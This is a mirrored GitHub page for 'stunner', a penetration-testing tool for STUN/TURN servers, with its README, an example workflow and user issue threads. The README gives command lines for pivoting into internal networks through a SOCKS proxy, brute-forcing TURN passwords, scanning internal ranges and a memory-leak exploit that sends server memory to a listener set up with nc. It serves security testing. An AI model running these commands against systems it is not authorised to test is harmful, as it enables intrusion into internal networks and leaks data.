firefart / stunner Goto Github PK

Stunner is a tool to test and exploit STUN, TURN and TURN over TCP servers.

License: Other

Go 95.26% Python 4.35% Dockerfile 0.39%

stun turn webrtc exploit misconfiguration security testing tool

stunner's Introduction

STUNNER

Stunner is a tool to test and exploit STUN, TURN and TURN over TCP servers. TURN is a protocol mostly used in videoconferencing and audio chats (WebRTC).

If you find a misconfigured server you can use this tool to open a local socks proxy that relays all traffic via the TURN protocol into the internal network behind the server.

I developed this tool during a test of Cisco Expressway which resulted in some vulnerabilities: https://firefart.at/post/multiple_vulnerabilities_cisco_expressway/

To get the required username and password you need to fetch them using an out-of-band method like sniffing the Connect request from a web browser with Burp. I added an example workflow at the bottom of the readme on how you would test such a server.

LICENSE

This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-sa/4.0/ or send a letter to Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.

implemented RFCs

STUN: RFC 5389

TURN: RFC 5766

TURN for TCP: RFC 6062

TURN Extension for IPv6: RFC 6156

Available Commands

info

This command will print some info about the stun or turn server like supported protocols and attributes like the used software.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS/DTLS on connecting to the STUN or TURN server (default: false)
--timeout value               connect timeout to turn server (default: 1s)
--help, -h                    show help (default: false)

Example

./stunner info -s x.x.x.x:443

range-scan

This command tries several private and restricted ranges to see if the TURN server is configured to allow connections to the specified IP addresses. If a specific range is not prohibited you can enumerate this range further with the other provided commands. If an ip is reachable it means the TURN server will forward traffic to this IP.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS/DTLS on connecting to the STUN or TURN server (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--help, -h                    show help (default: false)

Example

TCP based TURN connection (connection from you the TURN server):

./stunner range-scan -s x.x.x.x:3478 -u username -p password --protocol tcp

UDP based TURN connection (connection from you the TURN server):

./stunner range-scan -s x.x.x.x:3478 -u username -p password --protocol udp

socks

This is one of the most useful commands for TURN servers that support TCP connections to backend servers. It will launch a local socks5 server with no authentication and will relay all TCP traffic over the TURN protocol (UDP via SOCKS is currently not supported). If the server is misconfuigured it will forward the traffic to internal adresses so this can be used to reach internal systems and abuse the server as a proxy into the internal network. If you choose to also do DNS lookups over socks, it will be resolved using your local nameserver so it's best to work with private IPv4 and IPv6 addresses. Please be aware that this module can only relay TCP traffic.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS/DTLS on connecting to the STUN or TURN server (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--listen value, -l value      Address and port to listen on (default: "127.0.0.1:1080")
--drop-public, -x             Drop requests to public IPs. This is handy if the target can not connect to the internet and your browser want's to check TLS certificates via the connection. (default: true)
--help, -h                    show help (default: false)

Example

./stunner socks -s x.x.x.x:3478 -u username -p password -x

After starting the proxy open your browser, point the proxy in your settings to socks5 with an ip of 127.0.0.1:1080 (be sure to not set the bypass local address option as we want to reach the remote local addresses) and call the IP of your choice in the browser.

Example: https://127.0.0.1, https://127.0.0.1:8443 or https://[::1]:8443 (those will call the ports on the tested TURN server from the local interfaces).

You can also configure proxychains to use this proxy (but it will be very slow as each request results in multiple requests to enable the proxying). Just edit /etc/proxychains.conf and enter the value socks5 127.0.0.1 1080 under ProxyList.

Example of nmap over this socks5 proxy with a correct configured proxychains (note it's -sT to do TCP syns otherwise it will not use the socks5 proxy)

sudo proxychains nmap -sT -p 80,443,8443 -sV 127.0.0.1

brute-transports

This will most likely yield no useable information but can be useful to enumerate all available transports (=protocols to internal systems) supported by the server. This might show some custom protocol implementations but mostly will only return the defaults.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS/DTLS on connecting to the STUN or TURN server (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--help, -h                    show help (default: false)

Example

./stunner brute-transports -s x.x.x.x:3478 -u username -p password

brute-password

This command tries all passwords from a given file for a username via the TURN protocol (UDP). This can be useful when analysing a pcap where you can see the username but not the password. Please note that an offline bruteforce is much more faster in this case.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS/DTLS on connecting to the STUN or TURN server (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--passfile value, -p value    passwordfile to use for bruteforce
--help, -h                    show help (default: false)

Example

./stunner brute-password -s x.x.x.x:3478 -u username -p wordlist.txt

memoryleak

This attack works the following way: The server takes the data to send to target (must be a high port > 1024 in most cases) as a TLV (Type Length Value). This exploit uses a big length with a short value. If the server does not check the boundaries of the TLV, it might send you some memory up the length to the target. Cisco Expressway was confirmed vulnerable to this but according to cisco it only leaked memory of the current session.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS/DTLS on connecting to the STUN or TURN server (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--target value, -t value      Target to leak memory to in the form host:port. Should be a public server under your control
--size value                  Size of the buffer to leak (default: 35510)
--help, -h                    show help (default: false)

Example

To receive the data we need to set up a receiver on a server with a public ip. Normally firewalls are configured to only allow highports (>1024) from TURN servers so be sure to use a high port like 8080 in this example when connecting out to the internet.

sudo nc -u -l -n -v -p 8080 | hexdump -C

then execute the following statement on your machine adding the public ip to the t parameter

./stunner memoryleak -s x.x.x.x:3478 -t y.y.y.y:8080 -u username -p password

If it works you should see big loads of memory coming in, otherwise you will only see short messages.

udp-scanner

If a TURN server allows UDP connections to targets this scanner can be used to scan all private ip ranges and send them SNMP and DNS requests. As this checks a lot of IPs this can take multiple days to complete so use with caution or specify smaller targets via the parameters. You need to supply a SNMP community string that will be tried and a domain name that will be resolved on each IP. For the domain name you can for example use burp collaborator.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS/DTLS on connecting to the STUN or TURN server (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--community-string value      SNMP community string to use for scanning (default: "public")
--domain value                domain name to resolve on internal DNS servers during scanning
--ip value                    Scan single IP instead of whole private range. If left empty all private ranges are scanned. Accepts single IPs or CIDR format.  (accepts multiple inputs)
--help, -h                    show help (default: false)

Example

./stunner udp-scanner -s x.x.x.x:3478 -u username -p password --ip 192.168.0.1/24 --ip 10.0.0.1/8  --domain domain.you.control.com --community-string public

tcp-scanner

Same as udp-scanner but sends out HTTP requests to the specified ports (HTTPS is not supported)

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS/DTLS on connecting to the STUN or TURN server (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--ports value                 Ports to check (default: "80,443,8080,8081")
--ip value                    Scan single IP instead of whole private range. If left empty all private ranges are scanned. Accepts single IPs or CIDR format.  (accepts multiple inputs)
--help, -h                    show help (default: false)

Example

./stunner tcp-scanner -s x.x.x.x:3478 -u username -p password --ip 192.168.0.1/24 --ip 10.0.0.1/8

Example workflow

Let's say you find a service using WebRTC and want to test it.

First step is to get the required data. I suggest to launch Wireshark in the background and just join a meeting via Burp to collect all HTTP and Websocket traffic. Next search your burp history for some keywords related to TURN like 3478, password, credential and username (be sure to also check the websocket tab for these keywords). This might reveal the turn server and the protocol (UDP and TCP endpoints might have different ports) and the credentials used to connect. If you can't find the data in burp start looking at wireshark to identify the traffic. If it's on a non standard port (anything else then 3478) decode the protocol in Wireshark via a right click as STUN. This should show you the username used to connect and you can use this information to search burps history even further for the required data. Please note that Wireshark can't show you the password as the password is used to hash some package contents so it can not be reversed.

Next step would be to issue the info command to the turn server using the correct port and protocol obtained from burp.

If this works, the next step is a range-scan. If this allows any traffic to internal systems you can exploit this further but be aware that UDP has only limited use cases.

If TCP connections to internal systems are allowed simply launch the socks command and access the allowed IPs via a browser and set the socks proxy to 127.0.0.1:1080. You can try out 127.0.0.1:443 and other ips to find management interfaces.

stunner's People

Contributors

Stargazers

Watchers

stunner's Issues

SOCKS error: immediate timeout when using TLS

when curling public page using SOCKS, TCP, and TLS, immediately times out with:
ERRO[0034] socks error: could not cast control connection to TCPConn

Am running default coturn server setup with basic creds and self-signed cert. Changed default TURNS port to 443, but not running a web server. This works when the -tls flag is removed, but I would like to encrypt the connection. Am using Kali linux OS. TLS certs are valid when running openssl s_client.

./stunner socks -s 192.168.197.136:443 -u test -p password -tls -x --protocol tcp
proxychains curl -vk http://ipinfo.io
Receive error:
ERRO[0034] socks error: could not cast control connection to TCPConn

Seems to just immediately timeout and not hold open the connection?
Wireshark snippet of above

SOCKS error when getting TCP service banners

When attempting a ConnectionBind request to a TCP service which replies with a banner the Connection is terminated with a SOCKS error: message size received mismatch extra data: openssh 5.2 abcd (banner).

Can be recreated with nmap banner scan
Proxychains nmap -sT -Pn -sV -p 22 1.2.3.4

See attached image

Verify the TLS connection

The Stunner as a default does not verify the server's certificate verification. This makes a problem for my case. I set up the Coturn behind a Gateway that set the wrong TLS. I think it is better to add a new option to be able to enable/disable the TLS verification process.

FATA[0001] error on sending allocate request: ConnectionRead: timeout occurred

Hello, super cool tool. Had an opportunity for a security assessment to check out a STUN server but am running into some issues with the tool.

nmap and nessus are both reporting listeners on several STUN servers on port 3478 via UDP and are grabbing banners.

No matter what flags I pass I see the following (even if i specify --protocol udp). This happens on all servers I'm testing. If also choosing tls i just get a similar error about a timeout.

DEBU[0000] Sending
Header:
Message Type: Allocate(03) Request(00)
Message Length: 0
Message Transaction ID: 66736c6e7a46425a61454747
Attributes
REQUESTED-TRANSPORT: TCP
FATA[0001] error on sending allocate request: ConnectionRead: timeout occurred

Wireshark for your tool is showing Allocate Request TCP (REQUESTED-TRANSPORT TCP) but it is in UDP packets. nmap sends a binding request. not sure if this is a problem with my limited knowledge of STUN or it's just that the servers I'm scanning are hardened and won't allow any of the attacks your tool does.

Installation on Kali

Hi, I'm a student doing my ethical hacking thesis.
I'm wondering how can I install this amazing tool on my kali?
Thanks!!!

Incorrect REQUESTED-ADDRESS-FAMILY attribute length

stunner sets the length of the REQUESTED-ADDRESS-FAMILY attribute to 1 byte, whereas the "length of this attribute is 4 bytes" as per RFC 6256 (just as for e.g. REQUESTED-TRANSPORT, which does have the correct length):

(Wireshark calls it REQUESTED-ADDRESS-TYPE, as that was the initial name for attribute 0x0017.)

At least eturnal rejects requests for this reason (because "be strict in what you accept").

Many thanks for this great tool!

Stunner crashes when fetching Info

Hi,

thanks again for your awesome work.
Today i found stunner "freezing/crashing" when trying to fetch information from a Google STUN server with
stunner info -s 142.250.82.38:3478

It just stopped working.

Change the license to one from opensource.org

It does not make sense to have a CC license for software. I would suggest that a license from the Open Source Inc be considered. I would strongly encourage the GNU General Public LIcense v3 as the license.

stunner fails with udp and tls with coturn

Hi,

great util, makes troubleshooting stun/turn way easier. But I see different results when I'm using

./stunner info -s server.domain.tld:443 --protocol udp --tls

without the --tls it succeeds, so I don't think its a firewall issue. But with the --tls I'm getting an error that the server doesn't not support stun/udp/tcp. But if I connect my Nextcloud Talk instance with turns on udp, it says ICE is succesfull. With the protocol tcp I also don't have any issues.

I'm using coturn v4.5.2-3.1, they seem to be confirming to the RFC's:
https://github.com/coturn/coturn/blob/master/README.md

Can you elaborate on this?

it does not work with google server

stunner socks -s 74.125.247.128:3478 -u "username" -p "password"

upon a socks5 request:

time="2022-12-28T18:50:01+02:00" level=info msg="starting SOCKS server on 127.0.0.1:1080"
time="2022-12-28T18:50:06+02:00" level=info msg="Connecting to 104.26.1.100:443"
time="2022-12-28T18:50:06+02:00" level=error msg="socks error: error on allocate response: Error 442: "

adding 192.88.99.0/24 to range-scan command?

According to this configuration example with blocked private and multicast addresses, maybe it's a good idea to add 192.88.99.1 and 192.88.99.254 to range-scan command?

I don't know what's wrong

From one command prompt I do:

C:\>stunner socks -s "142.250.82.249:3478" -u "CNr2yKYGEgYsM4ipwOgY5vz/h7MLIICjBTAB" -p "PvR81fQZhd6kwAhNZDPre5YJSo8=" -x
from another shell I do:
curl -x socks5h://localhost:1080 https://www.google.com

On the first shell I get:

time="2023-08-07T16:26:43+03:00" level=info msg="starting SOCKS server on 127.0.0.1:1080"
time="2023-08-07T16:26:46+03:00" level=info msg="Connecting to 142.250.200.228:443"
time="2023-08-07T16:26:46+03:00" level=error msg="socks error: error on allocate response: Error 442: Unsupported Transport Protocol"

On the second one I get:
curl: (97) connection to proxy closed

Am I doing something wrong?

Connection refused in Test-Setup

Hi,
i got a problem, which i cant find the error in. I got a small test setup with coturn, and when trying to scan a ssh port lying behind the coturn, I always get a "Connection refused. Could you maybe help me find the error?

The Lab-Setup:
"External" "Internal"
Host-Network <------------> CoTurn VM <---------------------------------------> Small SSH
192.168.178.100 192.168.99.128 192.168.99.129

My Call:
./stunner tcp-scanner -u securetest -p buzzw0rt -s 192.168.178.100:3478 --ports 22 --ip 192.168.99.129 --timeout 60s

ERRO[0000] error on running HTTP Scan for 192.168.99.129:22: error on establishing control connection: error on establishing a connection to the server: dial tcp 192.168.178.100:3478: connect: connection refused

Debug Log from Stunner:
debug.log

COTURN-Config:
turnserver.conf.log

Log from COTURN-server

SSH is reachable from the coturn itself.

Is it maybe a test-lab-setup error?

Add option for no Authentication

Hi,

thanks again for the nice work of increasing the download functionality ^^.
Would it be possible to implement an option for a "non-authentication", e.g. when CoTurn is used with default settings, without any credentials?

If I read the config-file of CoTurn correctly, by default no authentication is in place.
https://github.com/coturn/coturn/blob/master/docker/coturn/turnserver.conf

Thanks a log ^^

conflicting results? with udp --tls

Hi,

If i execute stunner info -s server.domain.tld:443 --protocol tcp --tls it returns:

INFO[0000] this server supports the STUN protocol       
INFO[0000] Attributes:                                  
INFO[0000] 	RESPONSE-ORIGIN: 10.20.20.208:443           
INFO[0000] 	OTHER-ADDRESS: 10.20.20.208:5349            
INFO[0000] 	SOFTWARE: Coturn-4.5.1.1 'dan Eider'        
INFO[0000] this server supports the TURN protocol with UDP transports 
INFO[0000] Attributes:                                  
INFO[0000] 	REALM: server.domain.tld               
INFO[0000] 	SOFTWARE: Coturn-4.5.1.1 'dan Eider'        
INFO[0000] this server supports the TURN protocol with TCP transports 
INFO[0000] Attributes:                                  
INFO[0000] 	REALM: server.domain.tld               
INFO[0000] 	SOFTWARE: Coturn-4.5.1.1 'dan Eider'

But if do stunner info -s server.domain.tld:443 --tls it returns

INFO[0000] this server supports the STUN protocol       
INFO[0000] Attributes:                                  
INFO[0000] 	RESPONSE-ORIGIN: 10.20.20.208:443           
INFO[0000] 	OTHER-ADDRESS: 10.20.20.208:5349            
INFO[0000] 	SOFTWARE: Coturn-4.5.1.1 'dan Eider'        
ERRO[0001] this server does not support the TURN UDP protocol 
ERRO[0002] this server does not support the TURN TCP protocol

Why does it return the server does not support the turn protocol? Didn't we just tested succesfully in the query before? Does it default to other ports than 443 to test turn udp/tcp?

some other queries that might be of interest:

stunner info -s server.domain.tld:443 --protocol udp 
INFO[0000] this server supports the STUN protocol       
INFO[0000] Attributes:                                  
INFO[0000] 	RESPONSE-ORIGIN: 10.20.20.208:443           
INFO[0000] 	OTHER-ADDRESS: 10.20.20.208:5349            
INFO[0000] 	SOFTWARE: Coturn-4.5.1.1 'dan Eider'        
INFO[0000] this server supports the TURN protocol with UDP transports 
INFO[0000] Attributes:                                  
INFO[0000] 	REALM: server.domain.tld       
INFO[0000] 	SOFTWARE: Coturn-4.5.1.1 'dan Eider'        
INFO[0000] this server supports the TURN protocol with TCP transports 
INFO[0000] Attributes:                                  
INFO[0000] 	REALM: server.domain.tld    
INFO[0000] 	SOFTWARE: Coturn-4.5.1.1 'dan Eider'

stunner info -s server.domain.tld:443 --protocol udp --tls
INFO[0000] this server supports the STUN protocol       
INFO[0000] Attributes:                                  
INFO[0000] 	RESPONSE-ORIGIN: 10.20.20.208:443           
INFO[0000] 	OTHER-ADDRESS: 10.20.20.208:5349            
INFO[0000] 	SOFTWARE: Coturn-4.5.1.1 'dan Eider'        
ERRO[0001] this server does not support the TURN UDP protocol 
ERRO[0002] this server does not support the TURN TCP protocol

Error 401: Unauthorized

Hello, this appears to be the result of the 401 missing MessageIntegrity field during the linking process.
Please help me find where the problem is, thank you! :

➜  stunner_0.5.3_Darwin_arm64 ./stunner socks -s 192.168.68.252:3478 -u user -p 12345622 -x -d
INFO[0000] starting SOCKS server on 127.0.0.1:1080
DEBU[0003] got connection from 127.0.0.1:65244
INFO[0003] Connecting to 127.0.0.1:443
DEBU[0003] opened turn tcp control connection from 192.168.137.148:65245 to 192.168.68.252:3478
DEBU[0003] Sending
Header:
	Message Type: Allocate(03) Request(00)
	Message Length: 0
	Message Transaction ID: 565142777a50734875764d76
Attributes
	REQUESTED-TRANSPORT: TCP
DEBU[0003] Received
Header:
	Message Type: Allocate(03) Error Response(03)
	Message Length: 140
	Message Transaction ID: 565142777a50734875764d76
Attributes
	ERROR-CODE: Error 401: Unauthorized (no MessageIntegrity) Padding: 2
	REALM: reTurn Padding: 2
	NONCE: 1687845833:a869a6a6f39de1c83fc8ecbb18f10fa4 Padding: 1
	SOFTWARE: reTURNServer 1.9.10 (RFC5389)
DEBU[0003] Sending
Header:
	Message Type: Allocate(03) Request(00)
	Message Length: 0
	Message Transaction ID: 436669596f65547051454572
Attributes
	REQUESTED-TRANSPORT: TCP
	USERNAME: user
	REALM: reTurn
	NONCE: 1687845833:a869a6a6f39de1c83fc8ecbb18f10fa4
DEBU[0004] Received
Header:
	Message Type: Allocate(03) Error Response(03)
	Message Length: 116
	Message Transaction ID: 436669596f65547051454572
Attributes
	ERROR-CODE: Error 401: Unauthorized
	REALM: reTurn Padding: 2
	NONCE: 1687845833:a869a6a6f39de1c83fc8ecbb18f10fa4 Padding: 1
	SOFTWARE: reTURNServer 1.9.10 (RFC5389)
ERRO[0004] socks error: error on allocate response: Error 401: Unauthorized
DEBU[0004] client connection closed
DEBU[0004] got connection from 127.0.0.1:65246
INFO[0004] Connecting to 127.0.0.1:443
DEBU[0004] opened turn tcp control connection from 192.168.137.148:65247 to 192.168.68.252:3478
DEBU[0004] Sending
Header:
	Message Type: Allocate(03) Request(00)
	Message Length: 0
	Message Transaction ID: 77486e7a6a5a765171485244
Attributes
	REQUESTED-TRANSPORT: TCP
DEBU[0004] Received
Header:
	Message Type: Allocate(03) Error Response(03)
	Message Length: 140
	Message Transaction ID: 77486e7a6a5a765171485244
Attributes
	ERROR-CODE: Error 401: Unauthorized (no MessageIntegrity) Padding: 2
	REALM: reTurn Padding: 2
	NONCE: 1687845833:a869a6a6f39de1c83fc8ecbb18f10fa4 Padding: 1
	SOFTWARE: reTURNServer 1.9.10 (RFC5389)
DEBU[0004] Sending
Header:
	Message Type: Allocate(03) Request(00)
	Message Length: 0
	Message Transaction ID: 49796953735a4e746d716678
Attributes
	REQUESTED-TRANSPORT: TCP
	USERNAME: user
	REALM: reTurn
	NONCE: 1687845833:a869a6a6f39de1c83fc8ecbb18f10fa4
DEBU[0004] Received
Header:
	Message Type: Allocate(03) Error Response(03)
	Message Length: 116
	Message Transaction ID: 49796953735a4e746d716678
Attributes
	ERROR-CODE: Error 401: Unauthorized
	REALM: reTurn Padding: 2
	NONCE: 1687845833:a869a6a6f39de1c83fc8ecbb18f10fa4 Padding: 1
	SOFTWARE: reTURNServer 1.9.10 (RFC5389)
ERRO[0004] socks error: error on allocate response: Error 401: Unauthorized

socks4 not yet implemented"

I setup windows to point to localhost:1080
But I get this error:
level=error msg="socks error: socks4 not yet implemented"

firefart / stunner Goto Github PK

stunner's Introduction

STUNNER

LICENSE

implemented RFCs

Available Commands

info

Options

Example

range-scan

Options

Example

socks

Options

Example

brute-transports

Options

Example

brute-password

Options

Example

memoryleak

Options

Example

udp-scanner

Options

Example

tcp-scanner

Options

Example

Example workflow

stunner's People

Contributors

Stargazers

Watchers

Forkers

stunner's Issues

Recommend Projects

Recommend Topics

Recommend Org